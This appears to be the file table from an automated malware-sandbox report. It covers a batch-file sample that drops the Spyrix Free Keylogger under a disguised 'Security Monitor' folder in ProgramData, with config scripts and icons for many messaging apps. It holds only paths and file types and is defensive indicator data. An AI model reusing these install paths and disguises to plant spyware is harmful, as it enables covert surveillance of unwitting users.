Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
c5WMpr1cOc.bat
|
ASCII text, with CRLF line terminators
|
initial sample
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
|
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
|
dropped
|
||
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
|
Windows Registry little-endian text (Win2K or above)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0x6c0fd194, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
|
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0792H.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-2Q0P0.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-3VJA0.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4E6MA.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4UKF4.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-54RJK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-66N62.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7PKRJ.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8TP7V.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9G9CC.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9QS94.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-A3UU9.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-C9L4A.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CE435.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CKQ4V.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D8KLK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ESC9P.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F07T0.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F8DRF.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-F9LNN.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FKG2G.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-GQ638.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-GS1MF.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HBAE2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HLNSP.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-HO3LF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-IICD2.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JQ1MF.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JUD98.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KS758.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-L8G0P.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-M4A4H.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-M71GK.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-N8RGH.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NCBB7.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NNA59.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NSHLH.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OHQNG.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OO1JS.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-P1FFP.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PF9N1.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PLO9O.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PU4P5.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-Q50E1.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-R0STO.tmp
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-T5SOE.tmp
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
|
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-2GLLF.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5280P.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6CGGI.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-736MC.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-A0CJS.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C4O2C.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-C7Q4R.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-DCR92.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FBQMF.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FTLS9.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-INTC6.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-K1B48.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-KGHQE.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-N4L5B.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-NC0JK.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OSOH0.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-P3TCG.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QLCN5.tmp
|
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
|
dropped
|
